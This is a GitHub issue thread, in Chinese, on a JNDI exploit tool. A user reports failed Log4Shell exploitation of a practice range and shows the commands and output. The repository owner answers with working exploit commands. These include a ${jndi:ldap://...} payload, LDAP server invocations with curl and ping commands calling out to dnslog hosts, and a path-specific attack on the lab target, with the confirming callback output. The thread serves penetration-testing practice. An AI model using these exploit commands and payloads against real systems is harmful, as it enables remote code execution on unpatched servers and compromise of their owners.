Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Log4j 靶场漏洞检测失败 #15

Open
Asura88 opened this issue Dec 19, 2021 · 1 comment
Open

Log4j 靶场漏洞检测失败 #15

Asura88 opened this issue Dec 19, 2021 · 1 comment

Comments

@Asura88
Copy link

Asura88 commented Dec 19, 2021

Log4j 靶场漏洞检测失败

image

[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.

@wyzxxz
Copy link
Owner

wyzxxz commented Dec 20, 2021

默认的这个,只加了部分场景和最常见的payload利用方式,如果不成功,
启动下jndi服务,然后burp发下http请求尝试
java -cp jndi_tool.jar jndi.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn"
java -cp jndi_tool.jar jndi.LDAPRefServer 1099

靶场这个,是需要路径触发的,可以这样:
java -cp jndi_tool.jar jndi.log4j.HLDAPLog4j 121.40.166.141 80 "ping jnoizd.dnslog.cn" http://d63bb2586.lab.aqlab.cn/zkaq/log4jrce w=tomcat

返回
jnoizd.dnslog.cn | 59.63.230.105 | 2021-12-20 10:15:18

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants